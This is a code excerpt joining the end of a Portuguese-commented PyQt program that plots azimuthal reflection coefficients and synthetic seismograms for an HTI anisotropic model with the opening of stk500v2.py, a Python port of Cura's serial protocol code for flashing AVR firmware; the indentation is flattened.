solo_x_90.append(np.sqrt(float(coluna[3])**2+float(coluna[4])**2))
solo_y_90.append(np.sqrt(float(coluna[5]) ** 2 + float(coluna[6]) ** 2))
solo_z_90.append(np.sqrt(float(coluna[7]) ** 2 + float(coluna[8]) ** 2))
fase_x_90.append(np.arctan2(float(coluna[4]), float(coluna[3])))
fase_y_90.append(np.arctan2(float(coluna[6]), float(coluna[5])))
fase_z_90.append(np.arctan2(float(coluna[8]), float(coluna[7])))
f_90.close()
geo_90 = np.asarray(geofone_90)
x_90 = np.asarray(x_90)
y_90 = np.asarray(y_90)
z_90 = np.asarray(z_90)
xc_90 = np.asarray(xc_90)
yc_90 = np.asarray(yc_90)
zc_90 = np.asarray(zc_90)
x90_re = np.fliplr([x_90])[0]
y90_re = np.fliplr([y_90])[0]
z90_re = np.fliplr([z_90])[0]
x90c_re = np.fliplr([xc_90])[0]
y90c_re = np.fliplr([yc_90])[0]
z90c_re = np.fliplr([zc_90])[0]
ampx_90 = np.sqrt(x90_re ** 2 + x90c_re ** 2)
ampy_90 = np.sqrt(y90_re ** 2 + y90c_re ** 2)
ampz_90 = np.sqrt(z90_re ** 2 + z90c_re ** 2)
phx_90 = np.arctan2(x90c_re, x90_re)
phy_90 = np.arctan2(y90c_re, y90_re)
phz_90 = np.arctan2(z90c_re, z90_re)
self.hti_fase_rad_90 = phx_90
self.hti_fase_z_90 = phz_90
geo90_re = self.dist
tot90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2 + ampz_90 ** 2)
rad_90 = np.sqrt(ampx_90 ** 2 + ampy_90 ** 2)
solo_x_90 = np.asarray(solo_x_90)
solo_x_90 = np.fliplr([solo_x_90])[0]
solo_y_90 = np.asarray(solo_y_90)
solo_y_90 = np.fliplr([solo_y_90])[0]
solo_z_90 = np.asarray(solo_z_90)
solo_z_90 = np.fliplr([solo_z_90])[0]
solo_90_tot = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2 + solo_z_90 ** 2)
solo_rad_90 = np.sqrt(solo_x_90 ** 2 + solo_y_90 ** 2)
fase_x_90 = np.asarray(fase_x_90)
fase_x_90 = np.fliplr([fase_x_90])[0]
fase_y_90 = np.asarray(fase_y_90)
fase_y_90 = np.fliplr([fase_y_90])[0]
fase_z_90 = np.asarray(fase_z_90)
fase_z_90 = np.fliplr([fase_z_90])[0]
self.refl_solo_x_90 = solo_rad_90
self.refl_solo_y_90 = solo_y_90
self.refl_solo_z_90 = solo_z_90
self.refl_tot_90 = tot90
self.refl_rad_90 = rad_90
self.refl_y_90 = y90_re
self.refl_z_90 = ampz_90
self.axes_anray_tot.plot(geo90_re, tot90, label=90)
self.axes_anray_rad.plot(geo90_re, rad_90, label=90)
self.axes_anray_z.plot(geo90_re, ampz_90, label=90)
self.axes_anray_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.5))
if two_layer == True:
self.axes_anray2_z.plot(geo90_re, solo_z_90, label=90)
self.axes_anray2_tot.plot(geo90_re, solo_90_tot, label=90)
self.axes_anray2_rad.plot(geo90_re, solo_rad_90, label=90)
self.axes_anray2_tot.legend(title='Azimute', fontsize=6, loc=2, ncol=5, bbox_to_anchor=(0, 1.4))
if self.split_box_anray_0_90.isChecked():
split_tot = np.zeros(len(geo0_re))
split_rad = np.zeros(len(geo0_re))
split_z = np.zeros(len(geo0_re))
for i in range(len(geo0_re)):
if tot0[i] > tot90[i]:
split_tot[i] = (tot0[i]-tot90[i])/tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
else:
split_tot[i] = (tot90[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo0_re[i], tot0[i], 'r+')
self.axes_anray_tot.plot(geo0_re[i], tot90[i], 'r+')
if abs(rad_0[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_0[i])-abs(rad_90[i]))/abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo0_re[i], rad_0[i], 'r+')
self.axes_anray_rad.plot(geo0_re[i], rad_90[i], 'r+')
if abs(ampz_0[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_0[i])-abs(ampz_90[i]))/abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo0_re[i], ampz_0[i], 'r+')
self.axes_anray_z.plot(geo0_re[i], ampz_90[i], 'r+')
self.axes_anray_tot2.bar(geo0_re, split_tot, width=0.7, alpha=0.1, color='red')
self.axes_anray_rad2.bar(geo0_re, split_rad, width=0.7, alpha=0.1, color='red')
self.axes_anray_z2.bar(geo0_re, split_z, width=0.7, alpha=0.1, color='red')
if self.split_box_anray_0_45.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot0[i] > tot45[i]:
split_tot[i] = (tot0[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
else:
split_tot[i] = (tot45[i] - tot0[i]) / tot0[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot0[i], 'b+')
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'b+')
if abs(rad_0[i]) > abs(rad_45[i]):
split_rad[i] = (abs(rad_0[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
else:
split_rad[i] = (abs(rad_45[i]) - abs(rad_0[i])) / abs(rad_0[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_0[i], 'b+')
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'b+')
if abs(ampz_0[i]) > abs(ampz_45[i]):
split_z[i] = (abs(ampz_0[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
else:
split_z[i] = (abs(ampz_45[i]) - abs(ampz_0[i])) / abs(ampz_0[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_0[i], 'b+')
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'b+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='blue')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='blue')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='blue')
if self.split_box_anray_30_60.isChecked():
split_tot = np.zeros(len(geo30_re))
split_rad = np.zeros(len(geo30_re))
split_z = np.zeros(len(geo30_re))
for i in range(len(geo30_re)):
if tot30[i] > tot60[i]:
split_tot[i] = (tot30[i] - tot60[i]) / tot60[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
else:
split_tot[i] = (tot60[i] - tot30[i]) / tot30[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo30_re[i], tot30[i], 'g+')
self.axes_anray_tot.plot(geo30_re[i], tot60[i], 'g+')
if abs(rad_30[i]) > abs(rad_60[i]):
split_rad[i] = (abs(rad_30[i]) - abs(rad_60[i])) / abs(rad_60[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
else:
split_rad[i] = (abs(rad_60[i]) - abs(rad_30[i])) / abs(rad_30[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo30_re[i], rad_30[i], 'g+')
self.axes_anray_rad.plot(geo30_re[i], rad_60[i], 'g+')
if abs(ampz_30[i]) > abs(ampz_60[i]):
split_z[i] = (abs(ampz_30[i]) - abs(ampz_60[i])) / abs(ampz_60[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
else:
split_z[i] = (abs(ampz_60[i]) - abs(ampz_30[i])) / abs(ampz_30[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo30_re[i], ampz_30[i], 'g+')
self.axes_anray_z.plot(geo30_re[i], ampz_60[i], 'g+')
self.axes_anray_tot2.bar(geo30_re, split_tot, width=0.7, alpha=0.1, color='green')
self.axes_anray_rad2.bar(geo30_re, split_rad, width=0.7, alpha=0.1, color='green')
self.axes_anray_z2.bar(geo30_re, split_z, width=0.7, alpha=0.1, color='green')
if self.split_box_anray_45_90.isChecked():
split_tot = np.zeros(len(geo45_re))
split_rad = np.zeros(len(geo45_re))
split_z = np.zeros(len(geo45_re))
for i in range(len(geo45_re)):
if tot45[i] > tot90[i]:
split_tot[i] = (tot45[i] - tot90[i]) / tot90[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
else:
split_tot[i] = (tot90[i] - tot45[i]) / tot45[i]
if split_tot[i] > 0.1:
self.axes_anray_tot.plot(geo45_re[i], tot45[i], 'y+')
self.axes_anray_tot.plot(geo45_re[i], tot90[i], 'y+')
if abs(rad_45[i]) > abs(rad_90[i]):
split_rad[i] = (abs(rad_45[i]) - abs(rad_90[i])) / abs(rad_90[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
else:
split_rad[i] = (abs(rad_90[i]) - abs(rad_45[i])) / abs(rad_45[i])
if split_rad[i] > 0.1:
self.axes_anray_rad.plot(geo45_re[i], rad_45[i], 'y+')
self.axes_anray_rad.plot(geo45_re[i], rad_90[i], 'y+')
if abs(ampz_45[i]) > abs(ampz_90[i]):
split_z[i] = (abs(ampz_45[i]) - abs(ampz_90[i])) / abs(ampz_90[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
else:
split_z[i] = (abs(ampz_90[i]) - abs(ampz_45[i])) / abs(ampz_45[i])
if split_z[i] > 0.1:
self.axes_anray_z.plot(geo45_re[i], ampz_45[i], 'y+')
self.axes_anray_z.plot(geo45_re[i], ampz_90[i], 'y+')
self.axes_anray_tot2.bar(geo45_re, split_tot, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_rad2.bar(geo45_re, split_rad, width=0.7, alpha=0.1, color='yellow')
self.axes_anray_z2.bar(geo45_re, split_z, width=0.7, alpha=0.1, color='yellow')
self.canvas_anray.draw()
self.canvas_anray2.draw()
except:
self.message()
self.plot_sismograma()
#Função para atualizar e mostrar os coeficientes de reflexão quando selecionado o azimute, xv é a componente radial e zv, vertical
def plot_sismograma_v(self):
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
self.label_x_max.setText(str((round(np.max(abs(xv)), 4))))
self.label_z_max.setText(str((round(np.max(abs(zv)), 4))))
#Função para plotar o sismograma
def plot_sismograma(self):
self.axes_sismo_x.cla()
self.axes_sismo_z.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
normal_f = self.doubleSpinBox_normalf.value()
dados_x = np.zeros([NX, NS])
dados_z = np.zeros([NX, NS])
FREQ = self.doubleSpinBox_freq.value()
OMEGA = 2 * np.pi * FREQ
GAMA = self.doubleSpinBox_gama.value()
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
wr_hti = []
wz_hti = []
wr_solo = []
wz_solo = []
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_x[i, ni] = 1
dados_z[i, ni] = 1
if self.checkBox_solo.isChecked():
self.frame_12.setEnabled(True)
self.checkBox_solo_sismo.setEnabled(True)
self.label_47.setEnabled(True)
t2 = self.time_solo
dados_solo_x = np.zeros([NX, NS])
dados_solo_z = np.zeros([NX, NS])
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.solo_fase_rad[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.solo_fase_z[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_solo.append(wr)
wz_solo.append(wz)
ni2 = int(t2[i] / dt)
dados_solo_x[i, ni2] = 1
dados_solo_z[i, ni2] = 1
if self.radioButton_0.isChecked():
xv = self.refl_rad_0
zv = self.refl_z_0
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_rad_0
zv2 = self.refl_solo_z_0
if self.radioButton_30.isChecked():
xv = self.refl_rad_30
zv = self.refl_z_30
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_30
zv2 = self.refl_solo_z_30
if self.radioButton_45.isChecked():
xv = self.refl_rad_45
zv = self.refl_z_45
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_45
zv2 = self.refl_solo_z_45
if self.radioButton_60.isChecked():
xv = self.refl_rad_60
zv = self.refl_z_60
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_60
zv2 = self.refl_solo_z_60
if self.radioButton_90.isChecked():
xv = self.refl_rad_90
zv = self.refl_z_90
for i in range(0, NX):
wr = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wz = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
wr_hti.append(wr)
wz_hti.append(wz)
if self.checkBox_solo_sismo.isChecked():
xv2 = self.refl_solo_x_90
zv2 = self.refl_solo_z_90
self.plot_sismograma_v()
fatorganhodisplay = normal_f
if self.radioButton_normx.isChecked():
fatorganhodisplay = 1/np.max(abs(xv))
if self.radioButton_normz.isChecked():
fatorganhodisplay = 1/np.max(abs(zv))
if self.radioButton_norm_def.isChecked():
fatorganhodisplay = 1/self.doubleSpinBox_normalf.value()
for i in range(dados_x.shape[0]):
wx = wr_hti[i]*xv[i]
wz = wz_hti[i]*zv[i]
dados_x[i, :] = np.convolve(dados_x[i, :], wx, mode='same')
dados_z[i, :] = np.convolve(dados_z[i, :], wz, mode='same')
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
for i in range(dados_x.shape[0]):
if self.checkBox_solo_sismo2.isChecked():
if i == 0:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
else:
dados_solo_x[i, :] = 0
dados_solo_z[i, :] = 0
else:
wx2 = wr_solo[i] * xv2[i]
wz2 = wz_solo[i] * zv2[i]
dados_solo_x[i, :] = np.convolve(dados_solo_x[i, :], wx2, mode='same')
dados_solo_z[i, :] = np.convolve(dados_solo_z[i, :], wz2, mode='same')
for i in range(0, NX):
data_x = x[i]+ (dados_x[i] + dados_solo_x[i]) * fatorganhodisplay
data_z = x[i] +(dados_z[i] + dados_solo_z[i]) * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x, where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
else:
for i in range(0, NX):
data_x = x[i] + dados_x[i] * fatorganhodisplay
data_z = x[i] + dados_z[i] * fatorganhodisplay
self.axes_sismo_x.plot(data_x, t, '-', color='black')
self.axes_sismo_z.plot(data_z, t, '-', color='black')
self.axes_sismo_x.fill_betweenx(t, x[i], data_x , where=(data_x > x[i]), color='black')
self.axes_sismo_z.fill_betweenx(t, x[i], data_z, where=(data_z > x[i]), color='black')
self.axes_sismo_x.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.axes_sismo_z.set_ylim([np.max(t), self.doubleSpinBox_tmin.value()])
self.canvas_sismo.draw()
self.plot_sismo_azim()
self.az_tmax.setValue(np.max(t))
#Plota os sismogramas da mesma componente para azimutes diferentes. Normalizado de forma ao maior valor entre os dois ser igual a 1.
def plot_sismo_azim(self):
self.axes_sismo2_1.cla()
self.axes_sismo2_2.cla()
Tmax = self.doubleSpinBox_tmax.value()
dt = self.doubleSpinBox_dt.value()
NS = int((Tmax / dt) + 1)
t = np.arange(NS) * dt
t1 = self.time_basalto
x1 = self.spinBox_rmin.value()
dx = self.spinBox_rstep.value()
NX = self.spinBox_ngeo.value()
x = np.arange(NX) * dx + x1
dados_1 = np.zeros([NX, NS])
dados_2 = np.zeros([NX, NS])
w_1=[]
w_2=[]
r1 = 0
r2 = 0
try:
for i in range(0, NX):
ni = int(t1[i] / dt)
dados_1[i, ni] = 1
dados_2[i, ni] = 1
FREQ = 50
OMEGA = 2 * np.pi * FREQ
GAMA = 4.
PSI = 0.
TSH = 0.45 * GAMA / FREQ
tw = np.arange(-TSH, TSH + dt, dt)
w = np.cos(OMEGA * tw + PSI) * np.exp(-(OMEGA * tw / GAMA) ** 2)
if self.radio_sismo_0_90.isChecked():
label1 = '0'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_0_45.isChecked():
label1 = '0'
label2 = '45'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_0
r2 = self.refl_rad_45
max_1 = np.max(abs(self.refl_rad_0))
max_2 = np.max(abs(self.refl_rad_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_0
r2 = self.refl_z_45
max_1 = np.max(abs(self.refl_z_0))
max_2 = np.max(abs(self.refl_z_45))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_0[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_30_60.isChecked():
label1 = '30'
label2 = '60'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_30
r2 = self.refl_rad_60
max_1 = np.max(abs(self.refl_rad_30))
max_2 = np.max(abs(self.refl_rad_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_30
r2 = self.refl_z_60
max_1 = np.max(abs(self.refl_z_30))
max_2 = np.max(abs(self.refl_z_60))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_30[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_60[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radio_sismo_45_90.isChecked():
label1 = '45'
label2 = '90'
if self.radioButton_plot_x.isChecked():
r1 = self.refl_rad_45
r2 = self.refl_rad_90
max_1 = np.max(abs(self.refl_rad_45))
max_2 = np.max(abs(self.refl_rad_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_rad_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_rad_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
if self.radioButton_plot_z.isChecked():
r1 = self.refl_z_45
r2 = self.refl_z_90
max_1 = np.max(abs(self.refl_z_45))
max_2 = np.max(abs(self.refl_z_90))
for i in range(0, NX):
w1 = np.cos(OMEGA * tw + self.hti_fase_z_45[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w2 = np.cos(OMEGA * tw + self.hti_fase_z_90[i]) * np.exp(-(OMEGA * tw / GAMA) ** 2)
w_1.append(w1)
w_2.append(w2)
for i in range(dados_1.shape[0]):
w1 = w_1[i] * r1[i]
w2 = w_2[i] * r2[i]
dados_1[i, :] = np.convolve(dados_1[i, :], w1, mode='same')
dados_2[i, :] = np.convolve(dados_2[i, :], w2, mode='same')
if max_1 > max_2:
fatorganhodisplay = 1/max_1
else:
fatorganhodisplay = 1/max_2
for i in range(0, NX):
data_1 = x[i] + dados_1[i] * fatorganhodisplay
data_2 = x[i] + dados_2[i] * fatorganhodisplay
self.axes_sismo2_1.plot(data_1, t, '-', color='black')
self.axes_sismo2_1.set_title('azimute %s' %label1)
self.axes_sismo2_1.set_ylabel('Tempo (s)')
self.axes_sismo2_1.set_xlabel('Distância (m)')
self.axes_sismo2_1.fill_betweenx(t, x[i], data_1 , where=(data_1 > x[i]), color='black')
self.axes_sismo2_2.plot(data_2, t, '-', color='black')
self.axes_sismo2_2.set_title('azimute %s' %label2)
self.axes_sismo2_2.set_ylabel('Tempo (s)')
self.axes_sismo2_2.set_xlabel('Distância (m)')
self.axes_sismo2_2.fill_betweenx(t, x[i], data_2, where=(data_2 > x[i]), color='black')
self.axes_sismo2_1.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.axes_sismo2_2.set_ylim([self.az_tmax.value(), self.az_tmin.value()])
self.canvas_sismo2.draw()
except:
self.message()
def sismo_enable(self):
if self.checkBox_solo_sismo.isChecked():
self.checkBox_solo_sismo2.setEnabled(True)
else:
self.checkBox_solo_sismo2.setEnabled(False)
# Função que converte a distancia dos geofones para ângulo (1 camada)
def geofone_to_angle(self, number, rmin, rstep, prof):
a = []
for i in range(number):
if i == 0:
a.append(rmin)
dist = rmin
else:
dist = dist + rstep
a.append(dist)
array = np.asarray(a)
angles = np.degrees(np.arctan((array / 2) / prof))
return angles, a
# Função que converte a distancia dos geofones para ângulo (2 camadas),
# v1 = velocidade no solo, v2= velocidade na camada 1
# p1=espessura do solo, p2=espessura da 1 camada
def geofone_to_angle_2(self, number, rmin, rstep, v1, v2, p1, p2):
li = []
for i in range(number):
if i == 0:
li.append(rmin)
dist = rmin
else:
dist = dist + rstep
li.append(dist)
arr = np.asarray(li)
a = v1 ** 2 - v2 ** 2
z = arr / 2
b = 2 * z * a
c = a * (z ** 2) - (v2 ** 2) * (p2 ** 2) + (v1 ** 2) * (p1 ** 2)
d = 2 * z * ((v2 ** 2) * (p2 ** 2))
e = (v1 ** 2) * (p1 ** 2) - (v2 ** 2) * (p2 ** 2) * (z ** 2)
p = [a, -b, c, d, e]
j = []
for i in range(len(li)):
vlist = list()
v = roots(a * x ** 4 - b[i] * x ** 3 + c[i] * x ** 2 + d[i] * x + e[i], x)
for po in v.keys():
if "I" not in str(po) and po > 0 and po < arr[i]:
vlist.append(po)
j.append(float(vlist[0]))
m = np.asarray(j)
tt = np.arctan(m / p2)
angles = np.degrees(tt)
#Analise dos angulos. Para verificar os angulos basta descomentar as linhas seguintes
# inc = (v1/v2)*np.sin(tt)
# angles_inc = np.arcsin(inc)
# angles_inc_degree = np.degrees(angles_inc)
# print('angulos de transmissao', angles)
# print('angulos de incidencia', angles_inc_degree)
# ang_critico2 = np.arcsin(v1/ v2)
# ang_critico_graus2 = ang_critico2 * 180 / np.pi
# print('angulo critico=', ang_critico_graus2)
return angles
def reflect_travel_time(self, nlayer, thick1, i_l1,v1, thick2, i_l2, v2):
geo = []
if nlayer == 1:
for i in range(len(i_l1)):
geo.append(i + 1)
d = thick1/np.cos(i_l1*np.pi/180)
t = 2*d/v1
if nlayer == 2:
for i in range(len(i_l2)):
geo.append(i + 1)
d2= thick2/np.cos(i_l2*np.pi/180)
t2 = 2 * d2 / v2
theta1 = np.arcsin((v1/v2)*np.sin(i_l2*np.pi/180))
d1 = thick1 / np.cos(theta1)
t1=2*d1/v1
t = t1+t2
return(geo, t)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QMainWindow()
prog = MyFirstGuiProgram(dialog)
dialog.show()
sys.exit(app.exec_())
|
stk500v2.py
|
"""
STK500v2 protocol implementation for programming AVR chips.
The STK500v2 protocol is used by the ArduinoMega2560 and a few other Arduino platforms to load firmware.
This is a python 3 conversion of the code created by David Braam for the Cura project.
"""
import struct
import sys
import time
from serial import Serial # type: ignore
from serial import SerialException
from serial import SerialTimeoutException
from UM.Logger import Logger
from . import ispBase, intelHex
class Stk500v2(ispBase.IspBase):
def __init__(self):
self.serial = None
self.seq = 1
self.last_addr = -1
self.progress_callback = None
def connect(self, port = "COM22", speed = 115200):
if self.serial is not None:
self.close()
try:
self.serial = Serial(str(port), speed, timeout=1, writeTimeout=10000)
except SerialException:
raise ispBase.IspError("Failed to open serial port")
except:
raise ispBase.IspError("Unexpected error while connecting to serial port:" + port + ":" + str(sys.exc_info()[0]))
self.seq = 1
#Reset the controller
for n in range(0, 2):
self.serial.setDTR(True)
time.sleep(0.1)
self.serial.setDTR(False)
time.sleep(0.1)
time.sleep(0.2)
self.serial.flushInput()
self.serial.flushOutput()
try:
if self.sendMessage([0x10, 0xc8, 0x64, 0x19, 0x20, 0x00, 0x53, 0x03, 0xac, 0x53, 0x00, 0x00]) != [0x10, 0x00]:
raise ispBase.IspError("Failed to enter programming mode")
self.sendMessage([0x06, 0x80, 0x00, 0x00, 0x00])
if self.sendMessage([0xEE])[1] == 0x00:
self._has_checksum = True
else:
self._has_checksum = False
except ispBase.IspError:
self.close()
raise
self.serial.timeout = 5
def close(self):
if self.serial is not None:
self.serial.close()
self.serial = None
